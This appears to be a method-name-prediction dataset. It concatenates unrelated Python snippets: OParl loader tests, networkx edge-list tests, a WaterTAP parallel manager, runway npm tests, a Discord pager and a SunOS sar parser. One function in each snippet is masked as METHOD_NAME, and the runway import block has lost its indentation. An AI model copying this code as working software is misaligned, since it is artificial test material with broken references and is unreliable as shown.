        # normalizes the value - as demanded by unity
        qx, qy, qz, qw = normalize_quaternion(qx, qy, qz, qw)
        # So these quat values need to be reversed? I have no idea why at the moment
        return round(qx, 13), round(-qy, 13), round(-qz, 13), round(qw, 13)
    else:
        raise RuntimeError(
            "Supplied matrix to spatial_to_quaternion is not a 1D spatial matrix in size."
        )
def normalize_quaternion(x, y, z, w):
    """Scale the quaternion components so the quaternion has unit length."""
    norm_sq = (x * x) + (y * y) + (z * z) + (w * w)
    f = 1.0 / math.sqrt(norm_sq)
    return x * f, y * f, z * f, w * f
def _getAngleTo(vec_origin: list, vec_current: Vector3D) -> float:
    """Return the angle (in radians) between vec_origin (an [x, y, z] list) and vec_current.

    NOTE(review): the original also computed a degrees conversion into an
    unused local and then returned radians; the dead local is removed and the
    radians return kept — confirm callers do not expect degrees.
    The return annotation was ``int`` but the value comes from ``angleTo``;
    it is annotated as ``float`` here.
    """
    origin = Vector3D.create(vec_origin[0], vec_origin[1], vec_origin[2])
    val = origin.angleTo(vec_current)
    return val
298,413 | test auxiliary file object | import logging
import responses
from importer.loader import CCEgovLoader
from importer.tests.utils import spurious_500
logger = logging.getLogger(__name__)
# Fixture: an OParl Meeting payload whose "auxiliaryFile" is (incorrectly) a
# single object instead of an array — exercises the loader's normalization path.
meeting_with_auxiliary_file_object = {
    "id": "https://www.bonn.sitzung-online.de/public/oparl/meetings?id=664",
    "type": "https://schema.oparl.org/1.1/Meeting",
    "name": "Sitzung des Projektbeirates Behindertenpolitischer Teilhabeplan",
    "meetingState": "eingeladen",
    "cancelled": False,
    "start": "2021-05-11T17:00:00+02:00",
    "end": "2021-05-12T00:00:00+02:00",
    "organization": [
        "https://www.bonn.sitzung-online.de/public/oparl/organizations?typ=gr&id=334"
    ],
    "invitation": {
        "id": (
            "https://www.bonn.sitzung-online.de/public/oparl/files?id=2026137&dtyp=108"
        ),
        "type": "https://schema.oparl.org/1.1/File",
        "name": "Öffentliche Tagesordnung",
        "date": "2021-04-27T21:51:03+02:00",
        "fileName": "37.docx",
        "mimeType": "docx",
        "size": 0,
        "accessUrl": "https://www.bonn.sitzung-online.de/public/doc?DOLFDNR=2026137&DOCTYP=108&OTYP=41",
        "downloadUrl": "",
        "created": "2021-05-01T10:32:32+02:00",
        "modified": "2021-05-01T10:32:32+02:00",
        "deleted": False,
    },
    "auxiliaryFile": {
        "id": (
            "https://www.bonn.sitzung-online.de/public/oparl/files?id=268781&dtyp=134"
        ),
        "type": "https://schema.oparl.org/1.1/File",
        "name": "Alle Anlagen öffentlich",
        "date": "2021-04-28T09:02:04+02:00",
        "fileName": "81.pdf",
        "mimeType": "pdf",
        "size": 553767,
        "accessUrl": "https://www.bonn.sitzung-online.de/public/doc?DOLFDNR=268781&DOCTYP=134&OTYP=41",
        "downloadUrl": "",
        "created": "2021-05-01T10:32:32+02:00",
        "modified": "2021-05-01T10:32:32+02:00",
        "deleted": False,
    },
    "agendaItem": [
        {
            "id": (
                "https://www.bonn.sitzung-online.de/public/oparl/agendaItems?id=2002135"
            ),
            "type": "https://schema.oparl.org/1.1/AgendaItem",
            "name": "Einführung und Verpflichtung",
            "number": "1",
            "order": 100001,
            "meeting": (
                "https://www.bonn.sitzung-online.de/public/oparl/meetings?id=664"
            ),
            "created": "2021-05-01T10:32:33+02:00",
            "modified": "2021-05-01T10:32:33+02:00",
            "deleted": False,
        }
    ],
    "web": "https://www.bonn.sitzung-online.de/public/to010?SILFDNR=664",
    "created": "2021-04-25T22:31:05+02:00",
    "modified": "2021-04-25T22:31:05+02:00",
    "deleted": False,
}
def test_spurious_500(caplog):
    # The loader retries on a spurious HTTP 500 and logs exactly one warning.
    spurious_500(CCEgovLoader({}))
    assert caplog.messages == [
        "Got an 500 for a CC e-gov request, retrying: 500 Server Error: Internal Server"
        " Error for url:"
        " https://ratsinfo.leipzig.de/bi/oparl/1.0/papers.asp?body=2387&p=2"
    ]
def METHOD_NAME(caplog):
    # A Meeting whose auxiliaryFile is a bare object must be normalized to a
    # list by the loader, with a corresponding warning logged.
    loader = CCEgovLoader({})
    with responses.RequestsMock() as requests_mock:
        requests_mock.add(
            requests_mock.GET,
            meeting_with_auxiliary_file_object["id"],
            json=meeting_with_auxiliary_file_object,
        )
        loaded = loader.load(meeting_with_auxiliary_file_object["id"])
    assert isinstance(loaded["auxiliaryFile"], list)
    assert caplog.messages == [
        "auxiliaryFile is supposed to be an array of objects, but is an object (in "
        "https://www.bonn.sitzung-online.de/public/oparl/meetings?id=664)"
    ]
def test_broken_json(pytestconfig, caplog):
    """Broken JSON with control character (U+0000 through U+001F except \n) that is not escaped"""
    # The loader must repair the payload, log the OParl bug, and still parse it.
    loader = CCEgovLoader({})
    with responses.RequestsMock() as requests_mock:
        requests_mock.add(
            requests_mock.GET,
            "https://ratsinfo.braunschweig.de/bi/oparl/1.0/papers.asp?id=1664",
            pytestconfig.rootpath.joinpath(
                "testdata/broken_json.broken_json"
            ).read_text(),
        )
        loaded = loader.load(
            "https://ratsinfo.braunschweig.de/bi/oparl/1.0/papers.asp?id=1664"
        )
    # (removed a leftover debug print of loaded["name"])
    assert len(loaded["name"]) == 127
    assert caplog.messages == [
        "The server returned invalid json. "
        "This is a bug in the OParl implementation: "
        "https://ratsinfo.braunschweig.de/bi/oparl/1.0/papers.asp?id=1664"
    ]
298,414 | test latin1 issue | """
Unit tests for bipartite edgelists.
"""
import io
import os
import tempfile
import pytest
import networkx as nx
from networkx.algorithms import bipartite
from networkx.utils import edges_equal, graphs_equal, nodes_equal
class TestEdgelist:
    """Round-trip and parsing tests for bipartite edge-list I/O."""

    @classmethod
    def setup_class(cls):
        # Shared fixtures: a 6-cycle with bipartite labels plus an isolated
        # node "g", a directed copy, and a 3-edge multigraph.
        cls.G = nx.Graph(name="test")
        e = [("a", "b"), ("b", "c"), ("c", "d"), ("d", "e"), ("e", "f"), ("a", "f")]
        cls.G.add_edges_from(e)
        cls.G.add_nodes_from(["a", "c", "e"], bipartite=0)
        cls.G.add_nodes_from(["b", "d", "f"], bipartite=1)
        cls.G.add_node("g", bipartite=0)
        cls.DG = nx.DiGraph(cls.G)
        cls.MG = nx.MultiGraph()
        cls.MG.add_edges_from([(1, 2), (1, 2), (1, 2)])
        cls.MG.add_node(1, bipartite=0)
        cls.MG.add_node(2, bipartite=1)

    def test_read_edgelist_1(self):
        # Comment lines must be skipped when reading.
        s = b"""\
# comment line
1 2
# comment line
2 3
"""
        bytesIO = io.BytesIO(s)
        G = bipartite.read_edgelist(bytesIO, nodetype=int)
        assert edges_equal(G.edges(), [(1, 2), (2, 3)])

    def test_read_edgelist_3(self):
        # Edge data dicts are ignored with data=False and parsed with data=True.
        s = b"""\
# comment line
1 2 {'weight':2.0}
# comment line
2 3 {'weight':3.0}
"""
        bytesIO = io.BytesIO(s)
        G = bipartite.read_edgelist(bytesIO, nodetype=int, data=False)
        assert edges_equal(G.edges(), [(1, 2), (2, 3)])
        bytesIO = io.BytesIO(s)
        G = bipartite.read_edgelist(bytesIO, nodetype=int, data=True)
        assert edges_equal(
            G.edges(data=True), [(1, 2, {"weight": 2.0}), (2, 3, {"weight": 3.0})]
        )

    def test_write_edgelist_1(self):
        fh = io.BytesIO()
        G = nx.Graph()
        G.add_edges_from([(1, 2), (2, 3)])
        G.add_node(1, bipartite=0)
        G.add_node(2, bipartite=1)
        G.add_node(3, bipartite=0)
        bipartite.write_edgelist(G, fh, data=False)
        fh.seek(0)
        # Edges are written from the bipartite-0 side.
        assert fh.read() == b"1 2\n3 2\n"

    def test_write_edgelist_2(self):
        fh = io.BytesIO()
        G = nx.Graph()
        G.add_edges_from([(1, 2), (2, 3)])
        G.add_node(1, bipartite=0)
        G.add_node(2, bipartite=1)
        G.add_node(3, bipartite=0)
        bipartite.write_edgelist(G, fh, data=True)
        fh.seek(0)
        assert fh.read() == b"1 2 {}\n3 2 {}\n"

    def test_write_edgelist_3(self):
        fh = io.BytesIO()
        G = nx.Graph()
        G.add_edge(1, 2, weight=2.0)
        G.add_edge(2, 3, weight=3.0)
        G.add_node(1, bipartite=0)
        G.add_node(2, bipartite=1)
        G.add_node(3, bipartite=0)
        bipartite.write_edgelist(G, fh, data=True)
        fh.seek(0)
        assert fh.read() == b"1 2 {'weight': 2.0}\n3 2 {'weight': 3.0}\n"

    def test_write_edgelist_4(self):
        fh = io.BytesIO()
        G = nx.Graph()
        G.add_edge(1, 2, weight=2.0)
        G.add_edge(2, 3, weight=3.0)
        G.add_node(1, bipartite=0)
        G.add_node(2, bipartite=1)
        G.add_node(3, bipartite=0)
        # Note: ("weight") is just the string "weight", not a 1-tuple.
        bipartite.write_edgelist(G, fh, data=[("weight")])
        fh.seek(0)
        assert fh.read() == b"1 2 2.0\n3 2 3.0\n"

    def test_unicode(self):
        # NOTE(review): os.close/os.unlink only run when the assertions pass,
        # so the temp file leaks on failure — pattern repeats in tests below.
        G = nx.Graph()
        name1 = chr(2344) + chr(123) + chr(6543)
        name2 = chr(5543) + chr(1543) + chr(324)
        G.add_edge(name1, "Radiohead", **{name2: 3})
        G.add_node(name1, bipartite=0)
        G.add_node("Radiohead", bipartite=1)
        fd, fname = tempfile.mkstemp()
        bipartite.write_edgelist(G, fname)
        H = bipartite.read_edgelist(fname)
        assert graphs_equal(G, H)
        os.close(fd)
        os.unlink(fname)

    def METHOD_NAME(self):
        # Non-latin-1 node names must fail to encode with a latin-1 writer.
        G = nx.Graph()
        name1 = chr(2344) + chr(123) + chr(6543)
        name2 = chr(5543) + chr(1543) + chr(324)
        G.add_edge(name1, "Radiohead", **{name2: 3})
        G.add_node(name1, bipartite=0)
        G.add_node("Radiohead", bipartite=1)
        fd, fname = tempfile.mkstemp()
        pytest.raises(
            UnicodeEncodeError, bipartite.write_edgelist, G, fname, encoding="latin-1"
        )
        os.close(fd)
        os.unlink(fname)

    def test_latin1(self):
        # Latin-1-representable names round-trip with the latin-1 codec.
        G = nx.Graph()
        name1 = "Bj" + chr(246) + "rk"
        name2 = chr(220) + "ber"
        G.add_edge(name1, "Radiohead", **{name2: 3})
        G.add_node(name1, bipartite=0)
        G.add_node("Radiohead", bipartite=1)
        fd, fname = tempfile.mkstemp()
        bipartite.write_edgelist(G, fname, encoding="latin-1")
        H = bipartite.read_edgelist(fname, encoding="latin-1")
        assert graphs_equal(G, H)
        os.close(fd)
        os.unlink(fname)

    def test_edgelist_graph(self):
        G = self.G
        (fd, fname) = tempfile.mkstemp()
        bipartite.write_edgelist(G, fname)
        H = bipartite.read_edgelist(fname)
        H2 = bipartite.read_edgelist(fname)
        assert H is not H2  # they should be different graphs
        G.remove_node("g")  # isolated nodes are not written in edgelist
        assert nodes_equal(list(H), list(G))
        assert edges_equal(list(H.edges()), list(G.edges()))
        os.close(fd)
        os.unlink(fname)

    def test_edgelist_integers(self):
        G = nx.convert_node_labels_to_integers(self.G)
        (fd, fname) = tempfile.mkstemp()
        bipartite.write_edgelist(G, fname)
        H = bipartite.read_edgelist(fname, nodetype=int)
        # isolated nodes are not written in edgelist
        G.remove_nodes_from(list(nx.isolates(G)))
        assert nodes_equal(list(H), list(G))
        assert edges_equal(list(H.edges()), list(G.edges()))
        os.close(fd)
        os.unlink(fname)

    def test_edgelist_multigraph(self):
        G = self.MG
        (fd, fname) = tempfile.mkstemp()
        bipartite.write_edgelist(G, fname)
        H = bipartite.read_edgelist(fname, nodetype=int, create_using=nx.MultiGraph())
        H2 = bipartite.read_edgelist(fname, nodetype=int, create_using=nx.MultiGraph())
        assert H is not H2  # they should be different graphs
        assert nodes_equal(list(H), list(G))
        assert edges_equal(list(H.edges()), list(G.edges()))
        os.close(fd)
        os.unlink(fname)

    def test_empty_digraph(self):
        # Directed graphs are not supported by the bipartite edgelist writer.
        with pytest.raises(nx.NetworkXNotImplemented):
            bytesIO = io.BytesIO()
            bipartite.write_edgelist(nx.DiGraph(), bytesIO)

    def test_raise_attribute(self):
        # Writing requires bipartite node attributes; a plain path graph lacks them.
        with pytest.raises(AttributeError):
            G = nx.path_graph(4)
            bytesIO = io.BytesIO()
            bipartite.write_edgelist(G, bytesIO)

    def test_parse_edgelist(self):
        """Tests for conditions specific to
        parse_edge_list method"""
        # ignore strings of length less than 2
        lines = ["1 2", "2 3", "3 1", "4", " "]
        G = bipartite.parse_edgelist(lines, nodetype=int)
        assert list(G.nodes) == [1, 2, 3]
        # Exception raised when node is not convertible
        # to specified data type
        with pytest.raises(TypeError, match=".*Failed to convert nodes"):
            lines = ["a b", "b c", "c a"]
            G = bipartite.parse_edgelist(lines, nodetype=int)
        # Exception raised when format of data is not
        # convertible to dictionary object
        with pytest.raises(TypeError, match=".*Failed to convert edge data"):
            lines = ["1 2 3", "2 3 4", "3 1 2"]
            G = bipartite.parse_edgelist(lines, nodetype=int)
        # Exception raised when edge data and data
        # keys are not of same length
        with pytest.raises(IndexError):
            lines = ["1 2 3 4", "2 3 4"]
            G = bipartite.parse_edgelist(
                lines, nodetype=int, data=[("weight", int), ("key", int)]
            )
        # Exception raised when edge data is not
        # convertible to specified data type
        with pytest.raises(TypeError, match=".*Failed to convert key data"):
            lines = ["1 2 3 a", "2 3 4 b"]
            G = bipartite.parse_edgelist(
                lines, nodetype=int, data=[("weight", int), ("key", int)]
            )
#################################################################################
# WaterTAP Copyright (c) 2020-2023, The Regents of the University of California,
# through Lawrence Berkeley National Laboratory, Oak Ridge National Laboratory,
# National Renewable Energy Laboratory, and National Energy Technology
# Laboratory (subject to receipt of any required approvals from the U.S. Dept.
# of Energy). All rights reserved.
#
# Please see the files COPYRIGHT.md and LICENSE.md for full copyright and license
# information, respectively. These files are also available online at the URL
# "https://github.com/watertap-org/watertap/"
#################################################################################
import numpy
from concurrent import futures
from watertap.tools.parallel.results import LocalResults
from watertap.tools.parallel.parallel_manager import build_and_execute, ParallelManager
class ConcurrentFuturesParallelManager(ParallelManager):
    """ParallelManager backed by concurrent.futures.ProcessPoolExecutor.

    Work is fanned out to local child processes; the calling process is
    always the root, so the peer-synchronization hooks are mostly no-ops
    or local copies.
    """

    def __init__(self, number_of_subprocesses=1, **kwargs):
        # Upper bound on workers; the actual count is capped by the number
        # of parameter sets when scatter() runs.
        self.max_number_of_subprocesses = number_of_subprocesses
        # this will be updated when child processes are kicked off
        self.actual_number_of_subprocesses = None
        # Future -> (process number, parameters). Used to keep track of the process number and parameters for
        # all in-progress futures
        self.running_futures = dict()

    def is_root_process(self):
        # The parent process is always the root for this manager.
        return True

    def get_rank(self):
        return self.ROOT_PROCESS_RANK

    def number_of_worker_processes(self):
        # Before scatter() runs we only know the configured maximum.
        if self.actual_number_of_subprocesses is None:
            return self.max_number_of_subprocesses
        return self.actual_number_of_subprocesses

    def sync_with_peers(self):
        # No peers to synchronize with in the single-root model.
        pass

    def sync_array_with_peers(self, data):
        # No-op: the root already holds the only copy of the data.
        pass

    def sync_pyobject_with_peers(self, obj):
        # Root's object is authoritative; return it unchanged.
        return obj

    def combine_data_with_peers(self, data):
        # Only one contributor, so the combined result is a singleton list.
        return [data]

    def METHOD_NAME(self, sendbuf, recvbuf):
        # Reduce-like hook: with a single participating process the "sum"
        # of all contributions is just a copy of the local send buffer.
        recvbuf[0][:] = sendbuf[0][:]

    def gather_arrays_to_root(self, sendbuf, recvbuf_spec):
        receive_arr = recvbuf_spec[0]
        receive_sizes = recvbuf_spec[1]

        assert len(receive_arr) == sum(
            receive_sizes
        ), "Gathering arrays to root cannot be done with mismatched sizes"

        # Single process: the gathered result is the local buffer verbatim.
        receive_arr[:] = sendbuf[:]

    def scatter(
        self,
        do_build,
        do_build_kwargs,
        do_execute,
        all_parameters,
    ):
        # constrain the number of child processes to the number of unique values to be run
        self.actual_number_of_subprocesses = min(
            self.max_number_of_subprocesses, len(all_parameters)
        )

        # split the parameters into chunks, one for each child process
        divided_parameters = numpy.array_split(
            all_parameters, self.actual_number_of_subprocesses
        )

        # create an executor and kick off the child processes that will perform the computation
        self.executor = futures.ProcessPoolExecutor(
            max_workers=self.actual_number_of_subprocesses
        )
        for i in range(self.actual_number_of_subprocesses):
            local_parameters = divided_parameters[i]
            # save the mapping of future -> (process number, params that it's running)
            self.running_futures[
                self.executor.submit(
                    build_and_execute,
                    do_build,
                    do_build_kwargs,
                    do_execute,
                    local_parameters,
                )
            ] = (i, local_parameters)

    def gather(self):
        """Wait for all in-flight futures and collect their LocalResults."""
        results = []
        try:
            # Blocks until every submitted future completes (or the wait
            # itself is interrupted); finished ones land in .done.
            execution_results = futures.wait(self.running_futures.keys())
            for future in execution_results.done:
                process_number, values = self.running_futures[future]
                results.append(LocalResults(process_number, values, future.result()))
            if len(execution_results.not_done) > 0:
                print(
                    f"{len(execution_results.not_done)} out of {len(self.running_futures.keys())} total subprocesses did not finish and provide results"
                )
        finally:
            # Always release the pool's worker processes.
            self.executor.shutdown()

        # sort the results by the process number to keep a deterministic ordering
        results.sort(key=lambda result: result.process_number)
        return results

    def results_from_local_tree(self, results):
        # Root holds all results locally; nothing to filter.
        return results
"""Test runway.module.utils."""
# pylint: disable=unused-argument
# pyright: basic
from __future__ import annotations
from pathlib import Path
from subprocess import CalledProcessError
from typing import TYPE_CHECKING, Any, List
import pytest
from runway.module.utils import (
NPM_BIN,
NPX_BIN,
format_npm_command_for_logging,
generate_node_command,
run_module_command,
use_npm_ci,
)
if TYPE_CHECKING:
from pytest_mock import MockerFixture
from pytest_subprocess import FakeProcess
MODULE = "runway.module.utils"
@pytest.mark.parametrize(
    "command, expected",
    [
        (["npx.cmd", "-c", "hello-world"], "npx.cmd -c hello-world"),
        (["npx", "-c", "hello-world"], "npx -c hello-world"),
        (["npm.cmd", "hello-world"], "npm.cmd hello-world"),
        (["npm", "hello-world"], "npm hello-world"),
    ],
)
def test_format_npm_command_for_logging_darwin(
    command: List[str], expected: str, platform_darwin: None
) -> None:
    """On Darwin/macOS npm/npx commands are joined without extra quoting."""
    result = format_npm_command_for_logging(command)
    assert result == expected
@pytest.mark.parametrize(
    "command, expected",
    [
        (["npx.cmd", "-c", "hello-world"], 'npx.cmd -c "hello-world"'),
        (["npx", "-c", "hello-world"], "npx -c hello-world"),
        (["npm.cmd", "hello-world"], "npm.cmd hello-world"),
        (["npm", "hello-world"], "npm hello-world"),
    ],
)
def test_format_npm_command_for_logging_windows(
    command: List[str], expected: str, platform_windows: None
) -> None:
    """On Windows the ``npx.cmd -c`` payload is quoted for cmd.exe."""
    result = format_npm_command_for_logging(command)
    assert result == expected
@pytest.mark.parametrize(
    "command, opts", [("test", []), ("test", ["arg1"]), ("test", ["arg1", "arg2"])]
)
def test_generate_node_command(
    command: str, mocker: MockerFixture, opts: List[str], tmp_path: Path
) -> None:
    """Without npx on PATH, fall back to the local node_modules/.bin script."""
    mock_which = mocker.patch(f"{MODULE}.which", return_value=False)
    expected = [str(tmp_path / "node_modules" / ".bin" / command), *opts]
    assert generate_node_command(command, opts, tmp_path) == expected
    mock_which.assert_called_once_with(NPX_BIN)
@pytest.mark.parametrize(
    "command, opts, expected",
    [
        ("test", [], [NPX_BIN, "-c", "test"]),
        ("test", ["arg1"], [NPX_BIN, "-c", "test arg1"]),
        ("test", ["arg1", "arg2"], [NPX_BIN, "-c", "test arg1 arg2"]),
    ],
)
def test_generate_node_command_npx(
    command: str,
    expected: List[str],
    mocker: MockerFixture,
    opts: List[str],
    tmp_path: Path,
) -> None:
    """With npx on PATH, commands are wrapped in ``npx -c``."""
    mock_which = mocker.patch(f"{MODULE}.which", return_value=True)
    result = generate_node_command(command, opts, tmp_path)
    assert result == expected
    mock_which.assert_called_once_with(NPX_BIN)
def test_generate_node_command_npx_package(
    mocker: MockerFixture, tmp_path: Path
) -> None:
    """An explicit package is forwarded to npx via ``--package``."""
    mock_which = mocker.patch(f"{MODULE}.which", return_value=True)
    result = generate_node_command(
        command="cdk",
        command_opts=["--context", "key=val"],
        package="aws-cdk",
        path=tmp_path,
    )
    assert result == [NPX_BIN, "--package", "aws-cdk", "cdk", "--context", "key=val"]
    mock_which.assert_called_once_with(NPX_BIN)
def test_run_module_command_called_process_error(fake_process: FakeProcess) -> None:
    """A failing command propagates CalledProcessError when exit_on_error=False."""
    command = ["test"]
    fake_process.register_subprocess(command, returncode=1)  # type: ignore
    with pytest.raises(CalledProcessError):
        run_module_command(command, {}, exit_on_error=False)
    assert fake_process.call_count(command) == 1  # type: ignore
def METHOD_NAME(
    fake_process: FakeProcess,
) -> None:
    """A failing command raises SystemExit when exit_on_error is left enabled."""
    command = ["test"]
    fake_process.register_subprocess(command, returncode=1)  # type: ignore
    with pytest.raises(SystemExit):
        run_module_command(command, {})
    assert fake_process.call_count(command) == 1  # type: ignore
def test_run_module_command_exit_on_error(fake_process: FakeProcess) -> None:
    """A successful command with exit_on_error enabled returns nothing."""
    command = ["test"]
    fake_process.register_subprocess(command, returncode=0)  # type: ignore
    assert not run_module_command(command, {})
    assert fake_process.call_count(command) == 1  # type: ignore
def test_run_module_command(fake_process: FakeProcess) -> None:
    """A successful command with exit_on_error disabled returns nothing."""
    command = ["test"]
    fake_process.register_subprocess(command, returncode=0)  # type: ignore
    assert not run_module_command(command, {}, exit_on_error=False)
    assert fake_process.call_count(command) == 1  # type: ignore
@pytest.mark.parametrize(
    "has_lock, has_shrinkwrap, exit_code, expected",
    [
        (False, False, 0, False),
        (False, False, 1, False),
        (True, False, 1, False),
        (False, True, 1, False),
        (True, True, 1, False),
        (True, False, 0, True),
        (False, True, 0, True),
        (True, True, 0, True),
    ],
)
def test_use_npm_ci(
    exit_code: int,
    expected: bool,
    fake_process: FakeProcess,
    has_lock: bool,
    has_shrinkwrap: bool,
    tmp_path: Path,
) -> None:
    """Test use_npm_ci.

    ``npm ci`` should only be used when a lock file is present and the local
    npm supports the ``ci`` subcommand (probed with ``npm ci -h``).
    """
    if has_lock:
        (tmp_path / "package-lock.json").touch()
    if has_shrinkwrap:
        # BUG FIX: previously touched package-lock.json a second time, so the
        # shrinkwrap-only parametrized cases never exercised the
        # npm-shrinkwrap.json code path of use_npm_ci.
        (tmp_path / "npm-shrinkwrap.json").touch()
    cmd: List[Any] = [NPM_BIN, "ci", "-h"]
    fake_process.register_subprocess(cmd, returncode=exit_code)
    assert use_npm_ci(tmp_path) is expected
    if has_lock or has_shrinkwrap:
        assert fake_process.call_count(cmd) == 1
    else:
        # No lock file means npm is never probed at all.
        assert fake_process.call_count(cmd) == 0
import asyncio
from contextlib import suppress
import discord
from redbot.core.utils import chat_formatting as chat
from redbot.core.utils.predicates import MessagePredicate
from redbot.vendored.discord.ext import menus
from tabulate import tabulate
class TopMenu(menus.MenuPages, inherit_buttons=False):
    """Reaction-driven leaderboard pager.

    Extends the vendored ``menus.MenuPages`` with first/last buttons,
    wrap-around previous/next paging, and a numeric page-jump prompt.
    """

    def __init__(
        self,
        source: menus.PageSource,
        timeout: int = 30,
    ):
        super().__init__(
            source,
            timeout=timeout,
            clear_reactions_after=True,
            delete_message_after=True,
        )

    def METHOD_NAME(self):
        # Predicate handed to skip_if on the double-triangle buttons; defers
        # to the base class to decide whether they should be hidden.
        return super().METHOD_NAME()

    async def finalize(self, timed_out):
        """|coro|
        A coroutine that is called when the menu loop has completed
        its run. This is useful if some asynchronous clean-up is
        required after the fact.
        Parameters
        --------------
        timed_out: :class:`bool`
            Whether the menu completed due to timing out.
        """
        # On timeout, keep the message around so the last page stays visible.
        if timed_out and self.delete_message_after:
            self.delete_message_after = False

    @menus.button(
        "\N{BLACK LEFT-POINTING DOUBLE TRIANGLE WITH VERTICAL BAR}\ufe0f",
        position=menus.First(0),
        skip_if=METHOD_NAME,
    )
    async def go_to_first_page(self, payload):
        """go to the first page"""
        await self.show_page(0)

    @menus.button("\N{BLACK LEFT-POINTING TRIANGLE}\ufe0f", position=menus.First(1))
    async def go_to_previous_page(self, payload):
        """go to the previous page"""
        # Wrap around to the last page when already on the first.
        if self.current_page == 0:
            await self.show_page(self._source.get_max_pages() - 1)
        else:
            await self.show_checked_page(self.current_page - 1)

    @menus.button("\N{BLACK RIGHT-POINTING TRIANGLE}\ufe0f", position=menus.Last(0))
    async def go_to_next_page(self, payload):
        """go to the next page"""
        # Wrap around to the first page when already on the last.
        if self.current_page == self._source.get_max_pages() - 1:
            await self.show_page(0)
        else:
            await self.show_checked_page(self.current_page + 1)

    @menus.button(
        "\N{BLACK RIGHT-POINTING DOUBLE TRIANGLE WITH VERTICAL BAR}\ufe0f",
        position=menus.Last(1),
        skip_if=METHOD_NAME,
    )
    async def go_to_last_page(self, payload):
        """go to the last page"""
        # The call here is safe because it's guarded by skip_if
        await self.show_page(self._source.get_max_pages() - 1)

    @menus.button("\N{NUMBER SIGN}\ufe0f\N{COMBINING ENCLOSING KEYCAP}", position=menus.Last(2))
    async def number_page(self, payload):
        """Prompt for a page number and jump there (clamped to the last page)."""
        prompt = await self.ctx.send("Send a number of page that you wish to see")
        try:
            pred = MessagePredicate.positive(self.ctx)
            msg = await self.bot.wait_for(
                "message_without_command",
                check=pred,
                timeout=10.0,
            )
            if pred.result:
                jump_page = int(msg.content)
                # Clamp out-of-range requests to the final page.
                if jump_page > self._source.get_max_pages():
                    jump_page = self._source.get_max_pages()
                await self.show_checked_page(jump_page - 1)
                # Tidy up the user's reply if we have permission to.
                if self.ctx.channel.permissions_for(self.ctx.me).manage_messages:
                    with suppress(discord.HTTPException):
                        await msg.delete()
        except asyncio.TimeoutError:
            # No reply within 10 seconds: silently give up.
            pass
        finally:
            with suppress(discord.HTTPException):
                await prompt.delete()

    @menus.button("\N{CROSS MARK}", position=menus.First(2))
    async def stop_pages(self, payload: discord.RawReactionActionEvent) -> None:
        """Stop the menu session."""
        self.stop()
class TopPager(menus.ListPageSource):
    """Page source that renders leaderboard rows as a monospace table embed."""

    def __init__(
        self, entries, board_type: str, is_level: bool, user_stats: list, icon_url: str, title: str
    ):
        super().__init__(entries, per_page=15)
        # Column header for the ranked stat (e.g. a currency name).
        self.board_type = board_type
        # Whether to include a "Level" column in the table.
        self.is_level = is_level
        # Invoking user's (rank, value) pair, or falsy when unavailable
        # (inferred from format_page usage below).
        self.user = user_stats
        self.icon_url = icon_url
        self.title = title

    async def format_page(self, menu: TopMenu, entries):
        """Render one page of entries into a Discord embed."""
        table = tabulate(
            entries,
            headers=["#", self.board_type, "Level", "Username"]
            if self.is_level
            else ["#", self.board_type, "Username"],
            tablefmt="rst",
        )
        # Right-align the page indicator and footer to the table's width.
        table_width = len(table.splitlines()[0])
        msg = ""
        msg += "[Page {}/{}]".format(menu.current_page + 1, self.get_max_pages()).rjust(
            table_width
        )
        msg += "\n"
        msg += table
        msg += "\n"
        if self.user:
            msg += "Your rank: {}".format(self.user[0]).rjust(table_width)
            msg += "\n"
            msg += "{}: {}".format(self.board_type, self.user[1]).rjust(table_width)
            msg += "\n"
        embed = discord.Embed(color=await menu.ctx.embed_color(), description=chat.box(msg))
        embed.set_author(name=self.title, icon_url=self.icon_url)
        return embed
import datetime
import os
from env import Env
from utilities.proc import call, which
from utilities.stats.provider import provider
# Reference dates for the two-day collection window, computed once at import
# time. NOTE(review): a long-lived process will keep a stale "today" — confirm
# callers re-import or restart daily before relying on these.
today = datetime.datetime.today()
yesterday = today - datetime.timedelta(days=1)
class StatsProvider(provider.BaseStatsProviderUx):
    """SunOS stats provider: not yet implemented."""
def sarfile(day):
    """Return the sysstat archive path for *day* ('DD'), or None if absent."""
    candidate = os.path.join(os.sep, 'var', 'adm', 'sa', 'sa' + day)
    return candidate if os.path.exists(candidate) else None
def twodays(fn):
    """Collect stats lines for yesterday and today via *fn*; [] if sar is missing."""
    if which('sar') is None:
        return []
    return fn(yesterday) + fn(today)
def stats_cpu():
    """CPU usage samples covering the last two days."""
    return twodays(stats_cpu_day)
def stats_cpu_day(t):
    """Parse per-CPU usage from the sysstat archive for day *t*.

    Returns rows in the collector's xmlrpc layout:
    [date, cpu, usr, nice, sys, iowait, steal, irq, soft, guest, idle, nodename]
    """
    d = t.strftime("%Y-%m-%d")
    day = t.strftime("%d")
    f = sarfile(day)
    if f is None:
        return []
    cmd = ['sar', '-u', '-P', 'ALL', '-f', f]
    (ret, buff, err) = call(cmd, errlog=False)
    lines = []
    for line in buff.split('\n'):
        l = line.split()
        # Data rows of SunOS `sar -u -P ALL` have exactly 6 fields; skip
        # header lines, the column-title row and the trailing averages.
        if len(l) != 6:
            continue
        if l[1] == '%usr':
            continue
        if l[0] == 'Average':
            continue
        # SunOS: date %usr %sys %wio %idle
        # xmlrpc: date cpu usr nice sys iowait steal irq soft guest idle nodename
        x = ['%s %s' % (d, l[0]), 'all', '0', '0', '0', '0', '0', '0', '0', '0', '0', Env.nodename]
        x[1] = l[1].replace('-', 'all')
        x[2] = l[2]
        x[4] = l[3]
        x[5] = l[4]
        x[10] = l[5]
        lines.append(x)
    return lines
def stats_mem_u(file, collect_date=None):
    """Memory usage samples for the last two days (no-op on this platform)."""
    return twodays(stats_mem_u_day)
def stats_mem_u_day(t):
    """Per-day memory stats: not implemented for SunOS, always empty."""
    return []
def stats_proc(file, collect_date=None):
    """Process/run-queue samples covering the last two days."""
    return twodays(stats_proc_day)
def stats_proc_day(t):
    """Parse run-queue length from the sysstat archive for day *t*."""
    d = t.strftime("%Y-%m-%d")
    day = t.strftime("%d")
    f = sarfile(day)
    if f is None:
        return []
    cmd = ['sar', '-q', '-f', f]
    (ret, buff, err) = call(cmd)
    lines = []
    for line in buff.split('\n'):
        l = line.split()
        if len(l) < 3:
            continue
        # Data rows start with a HH:MM:SS timestamp; skip headers/averages.
        if ':' not in l[0]:
            continue
        """ xmlrpc: date runq_sz plist_sz ldavg_1 ldavg_5 ldavg_15 nodename
        """
        x = ['%s %s' % (d, l[0]), l[1], '0', '0', '0', '0', Env.nodename]
        lines.append(x)
    return lines
